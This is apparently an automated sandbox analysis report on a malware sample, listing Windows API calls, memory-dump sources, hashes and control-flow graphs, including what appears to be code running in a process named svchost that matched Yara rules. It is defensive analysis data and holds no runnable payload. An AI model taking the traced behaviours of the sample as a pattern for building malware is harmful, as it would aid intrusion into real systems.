                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper_wcslen
                                                                      • String ID: CALLARGARRAY
                                                                      • API String ID: 157775604-1150593374
                                                                      • Opcode ID: 24982de71cc7990a57a60862e33888aaf4a4d5908f407c6c2d2b8445bbbaa071
                                                                      • Instruction ID: 162561f9cee836ceb322a6fa252ebc117468cf362b878f275c20024719621fa4
                                                                      • Opcode Fuzzy Hash: 24982de71cc7990a57a60862e33888aaf4a4d5908f407c6c2d2b8445bbbaa071
                                                                      • Instruction Fuzzy Hash: B041B271E0020A9FCB14DFA9C8819BEBBB5FF5A318F148129E515A7291E7349E81DB90
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C9D130
                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C9D13A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_wcslen
                                                                      • String ID: |
                                                                      • API String ID: 596671847-2343686810
                                                                      • Opcode ID: 9b545daa06d70d3c142eb4f9e8b44babd9281b0c3d2909d9ce1ba9790df53eda
                                                                      • Instruction ID: f7dc08d6ff230b6f1630f6f09851438176061917788d389396bd87d99a8c7a48
                                                                      • Opcode Fuzzy Hash: 9b545daa06d70d3c142eb4f9e8b44babd9281b0c3d2909d9ce1ba9790df53eda
                                                                      • Instruction Fuzzy Hash: CE313C71D01219ABCF15EFA5DC85AEEBFB9FF04310F100019F816B6162EB31AA56DB60
                                                                      APIs
                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C9CD7D
                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C9CDA6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      • Opcode ID: 9073e51ad43e5ec2ff13b18c1aa1cee6a0d7a8701c88845d8b83987b153abe7b
                                                                      • Instruction ID: 01d50f0c0fec5baa94fc2111d01bdd28edf872bfc3ca528a7e4fa5e187516f5b
                                                                      • Opcode Fuzzy Hash: 9073e51ad43e5ec2ff13b18c1aa1cee6a0d7a8701c88845d8b83987b153abe7b
                                                                      • Instruction Fuzzy Hash: 3311A3B22056317ADB244B668CC9FE7BE6CEB127A4F004226F11993080D6609950D6F0
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00C86CB6
                                                                      • _wcslen.LIBCMT ref: 00C86CC2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: STOP
                                                                      • API String ID: 1256254125-2411985666
                                                                      • Opcode ID: a7059eab0a96389844fd0602272c0a89901da725c7fe9afba927f4c12172bc23
                                                                      • Instruction ID: 7bbd57035349d102d62d64ec4d7b37cef6bd63eee92224e240b24c4dcc935eed
                                                                      • Opcode Fuzzy Hash: a7059eab0a96389844fd0602272c0a89901da725c7fe9afba927f4c12172bc23
                                                                      • Instruction Fuzzy Hash: 3101C032A105268BCB21BFFEDC809BF77B5FB61718B100529E86296190EA31DA00D754
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C81D4C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 47df3eead7af1c3f257fe63216dd0cbcb7c99be2ffc108f80dc79978c5f86f0a
                                                                      • Instruction ID: 6dfe83445a83c584c0be63e3ab8f186335a496ca4c9963d19210426bb027ccfd
                                                                      • Opcode Fuzzy Hash: 47df3eead7af1c3f257fe63216dd0cbcb7c99be2ffc108f80dc79978c5f86f0a
                                                                      • Instruction Fuzzy Hash: C201D875601228ABCB05FBA4DC51EFE73A8FB46354F08062AFC32572C1EA3059099764
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C81C46
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: e85c4471fde5c66b8eb9df9aa0ce103ee8cc0c14f9bcbf324b988ebe9b855769
                                                                      • Instruction ID: 87bc8c4073c9e14535991a93a2b7bc5ee7b4b11fac8707e24cefe84e23335bee
                                                                      • Opcode Fuzzy Hash: e85c4471fde5c66b8eb9df9aa0ce103ee8cc0c14f9bcbf324b988ebe9b855769
                                                                      • Instruction Fuzzy Hash: 9901A775B8111867CB04FB90D951EFF77ECEB16344F180029B816672C1EA209F0997B5
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C81CC8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 8202fca70cae867ffc0c847fe5e295b877c2b7bd6ed99e9dc29100022734a2e8
                                                                      • Instruction ID: aab7fdd9d05f85698c8440c27cd2b5aaa0a1596e44693cb8386e77ddf37ba8ee
                                                                      • Opcode Fuzzy Hash: 8202fca70cae867ffc0c847fe5e295b877c2b7bd6ed99e9dc29100022734a2e8
                                                                      • Instruction Fuzzy Hash: 9201D6B5B8012867CB04FBA5DA11EFE73ECAB12384F180025BC0273281EA709F09D775
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C81DD3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 5d28f1bd2867646633695e41f76eff5cf5a6fe7d98dde0c1289ba527faf87061
                                                                      • Instruction ID: 05ec9f82461bd89be9f6652d633783835a52367c670794ba3eabfbd21dd62c34
                                                                      • Opcode Fuzzy Hash: 5d28f1bd2867646633695e41f76eff5cf5a6fe7d98dde0c1289ba527faf87061
                                                                      • Instruction Fuzzy Hash: EBF0C871B5122867DB05F7A5DC52FFF77BCEB02758F080926BC22632C1DA705A099364
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C9302F
                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00C93044
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$FileNamePath
                                                                      • String ID: aut
                                                                      • API String ID: 3285503233-3010740371
                                                                      • Opcode ID: 4cfc0f439c58a064e0e07eaac1eaf5b6df1db888825b952df3a087433b1bd047
                                                                      • Instruction ID: 8eed56b951182e1f6d5aed5838a7606e4e4cc4adf4d81b0a7d83f87c291df078
                                                                      • Opcode Fuzzy Hash: 4cfc0f439c58a064e0e07eaac1eaf5b6df1db888825b952df3a087433b1bd047
                                                                      • Instruction Fuzzy Hash: C9D05EB290032867DA20A7A5AC4EFCB3A6CDB04750F0002A1B755E3091DAB89984CBE1
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C5BE93
                                                                      • GetLastError.KERNEL32 ref: 00C5BEA1
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C5BEFC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1717984340-0
                                                                      • Opcode ID: 1bf374ca8a6fbda83f6c16bd702db06c2e2229f425b6eb339e13b41e635264d5
                                                                      • Instruction ID: de9daac9c2736b90df334ebd0d4837c898ec9576fc6691e498b4cf73ca5d510c
                                                                      • Opcode Fuzzy Hash: 1bf374ca8a6fbda83f6c16bd702db06c2e2229f425b6eb339e13b41e635264d5
                                                                      • Instruction Fuzzy Hash: 6941C63C600206AFCB21CFA5CC45BAA7FA5AF41312F144269FD69571A1DB708E89DB64

                                                                      Execution Graph

                                                                      Execution Coverage:1.2%
                                                                      Dynamic/Decrypted Code Coverage:4.9%
                                                                      Signature Coverage:7.7%
                                                                      Total number of Nodes:143
                                                                      Total number of Limit Nodes:12

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 197 418153-41816f 198 418177-41817c 197->198 199 418172 call 42fd33 197->199 200 418182-418190 call 430333 198->200 201 41817e-418181 198->201 199->198 204 4181a0-4181b1 call 42e7d3 200->204 205 418192-41819d call 4305d3 200->205 210 4181b3-4181c7 LdrLoadDll 204->210 211 4181ca-4181cd 204->211 205->204 210->211
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004181C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: ff79105ba4eda4c34d62e1d2641d720007ffb5dd8a5b2f09d5c217583579c30e
                                                                      • Instruction ID: 633108fe4a20d12e7fe595a1a5a3ddb606de6311ecacd7af92866602d4060141
                                                                      • Opcode Fuzzy Hash: ff79105ba4eda4c34d62e1d2641d720007ffb5dd8a5b2f09d5c217583579c30e
                                                                      • Instruction Fuzzy Hash: C30175B2E0010DB7DF10DBE1DC42FDEB3789B54308F0041AAE90897240FA34EB458B95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 223 42d0d3-42d10f call 4046f3 call 42e2f3 NtClose
                                                                      APIs
                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042D10A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 9a07b63f02d8e796ddfdb53e18b4c4dc38963cf0b6de78ec5b5ab501614c7820
                                                                      • Instruction ID: 6349b41faa8d104575ad15ea66f78f4238bb9b11001270b56071bbc4c56fa462
                                                                      • Opcode Fuzzy Hash: 9a07b63f02d8e796ddfdb53e18b4c4dc38963cf0b6de78ec5b5ab501614c7820
                                                                      • Instruction Fuzzy Hash: A8E086316002147BD110EB5AEC01FDB776CEFC6710F004419FA0877242C6B57A0187F4

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 237 3272b60-3272b6c LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: b025d77a62f11f1eed1e72328b4ee612aa43932efe92562fd581d1c1ce5a9e6b
                                                                      • Instruction ID: c7c6ad0d887ab70681d3940a12e824ee390e4210c3010d7f8b001f408adcd377
                                                                      • Opcode Fuzzy Hash: b025d77a62f11f1eed1e72328b4ee612aa43932efe92562fd581d1c1ce5a9e6b
                                                                      • Instruction Fuzzy Hash: 54900261213404035105B2584454656400B87E0301B95C021E2014598DC62589D16125
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 1bf2e23e992389d684ef805eb616a84f4230a3a988c937a80146f9fe93ede7d5
                                                                      • Instruction ID: 08c92f790d007ad213cf6d198576e32fdb5c158c7133fcdbee90ef2e3630f501
                                                                      • Opcode Fuzzy Hash: 1bf2e23e992389d684ef805eb616a84f4230a3a988c937a80146f9fe93ede7d5
                                                                      • Instruction Fuzzy Hash: C890023121240813E111B2584544747000A87D0341FD5C412A142455CD97568A92A121

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 238 3272c70-3272c7c LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 19b4e0b6c3751859fcd04150ef890eec8e677e08b3c5e7009f258429284b7542
                                                                      • Instruction ID: 01a00796c32192788de56d093a3e7aa9b4512993e278b59e7f07e8cd41b973a8
                                                                      • Opcode Fuzzy Hash: 19b4e0b6c3751859fcd04150ef890eec8e677e08b3c5e7009f258429284b7542
                                                                      • Instruction Fuzzy Hash: 5290023121248C02E110B258844478A000687D0301F99C411A542465CD879589D17121
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: c6d2d24d0db3aa230777b4b6dc25a546a83c3edb711e036764e12e59dc01656c
                                                                      • Instruction ID: ab8cde747b1b756ad01261f2889df7f3f53fa2455326dc5a8d6216f9f210b343
                                                                      • Opcode Fuzzy Hash: c6d2d24d0db3aa230777b4b6dc25a546a83c3edb711e036764e12e59dc01656c
                                                                      • Instruction Fuzzy Hash: 7690023161650802E100B2584554746100687D0301FA5C411A142456CD87958A9165A2

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 41494b-41494c 1 4149cd-4149e1 0->1 2 41494e-41496a 0->2 3 414a03-414a08 1->3 4 4149e3-4149f4 PostThreadMessageW 1->4 4->3 5 4149f6-414a00 4->5 5->3
                                                                      APIs
                                                                      • PostThreadMessageW.USER32(721e5H878,00000111,00000000,00000000), ref: 004149F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 5H87$721e5H878$721e5H878
                                                                      • API String ID: 1836367815-1489328907
                                                                      • Opcode ID: fdbbf161827c6f767d32cabc59dbd208bfc05dc68352a7902a397133cf9176c8
                                                                      • Instruction ID: 3f605fd16debac9c66f54adbc8d6abf79e3e635aaca56c7d0f8750ed1924bdaa
                                                                      • Opcode Fuzzy Hash: fdbbf161827c6f767d32cabc59dbd208bfc05dc68352a7902a397133cf9176c8
                                                                      • Instruction Fuzzy Hash: 5CF0E931B4521875EB218A909C41BEEF778DF81B50F40419BEA04AB140D7B155058795

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(721e5H878,00000111,00000000,00000000), ref: 004149F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 721e5H878$721e5H878
                                                                      • API String ID: 1836367815-873499857
                                                                      • Opcode ID: 3314f233b8daac2975d4ad0def9b7a7b13c4934144ca131cb88065f4bc5abff1
                                                                      • Instruction ID: 63d5e1e3fc330f9fbd7032c630ef110b967b5a36bdfea62c1cdb53ab18a5a30d
                                                                      • Opcode Fuzzy Hash: 3314f233b8daac2975d4ad0def9b7a7b13c4934144ca131cb88065f4bc5abff1
                                                                      • Instruction Fuzzy Hash: 4C11DB31E8025875DB21A6A1CC02FDF7F7C9F81754F548169FE047B281E6B8560787EA

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 20 414973-414983 21 41498c-4149e1 call 42fc03 call 418153 call 404663 call 425873 20->21 22 414987 call 42f1f3 20->22 31 414a03-414a08 21->31 32 4149e3-4149f4 PostThreadMessageW 21->32 22->21 32->31 33 4149f6-414a00 32->33 33->31
                                                                      APIs
                                                                      • PostThreadMessageW.USER32(721e5H878,00000111,00000000,00000000), ref: 004149F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 721e5H878$721e5H878
                                                                      • API String ID: 1836367815-873499857
                                                                      • Opcode ID: e21c261d1a47e07bba5776479b39645046a2ef673df4aeebd1e31fbadc9bbd74
                                                                      • Instruction ID: 557cc803b3c01f60bdafb351f374e3597fd824c2159f93913bf22df86915f1db
                                                                      • Opcode Fuzzy Hash: e21c261d1a47e07bba5776479b39645046a2ef673df4aeebd1e31fbadc9bbd74
                                                                      • Instruction Fuzzy Hash: 0C01DB31E4035876DB21A6A18C02FDF7B7C5F81B54F408069FE047B2C1E6B8560787E9

                                                                      Control-flow Graph
                                                                      • Basic blocks: 34: 4181f3; 35: 4181f5-418205; 36: 4181c5-4181c7 (LdrLoadDll); 37: 418207-418214; 38: 4181ca-4181cd; 39: 41821a-418229; 40: 41822b-41822e; 41: 418230-418270
                                                                      • Edges: 34->35, 35->36, 35->37, 36->38, 37->39, 39->39, 39->40, 40->35, 40->41, 41->36, 41->37
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004181C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID: j
                                                                      • API String ID: 2234796835-2137352139
                                                                      • Opcode ID: fb286ee3766578796f74731f95f74484118e6b255d4df453717fb1e3e10f850a
                                                                      • Instruction ID: 6ced835e839dd839df220f9f2947c7c814bc0126b665532f51af8840255d92cd
                                                                      • Opcode Fuzzy Hash: fb286ee3766578796f74731f95f74484118e6b255d4df453717fb1e3e10f850a
                                                                      • Instruction Fuzzy Hash: BFE02B37580449EFCB11DDB8C582899B361EB95B3076403C9E85D4B689CB77AC4E874A

                                                                      Control-flow Graph
                                                                      • Basic blocks: 213: 42d3f3-42d437 (call 4046f3, call 42e2f3, RtlAllocateHeap)
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,0041EF2E,?,?,00000000,?,0041EF2E,?,?,?), ref: 0042D432
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: a52a85756bf179ed280f2f603ea5bec3513c43c458f35bb9d0ed9cbe90f592d4
                                                                      • Instruction ID: 09dd84127039a9d52dff1d70642511c976807b249c4408bc88f3ff0c4ac5e3fb
                                                                      • Opcode Fuzzy Hash: a52a85756bf179ed280f2f603ea5bec3513c43c458f35bb9d0ed9cbe90f592d4
                                                                      • Instruction Fuzzy Hash: 18E06DB1200214BFD710EE99EC41F9B37ADEFC5710F004419F908A7241D6B5B91087B8

                                                                      Control-flow Graph
                                                                      • Basic blocks: 218: 42d443-42d487 (call 4046f3, call 42e2f3, RtlFreeHeap)
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,04C483C8,00000007,00000000,00000004,00000000,004179C7,000000F4), ref: 0042D482
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
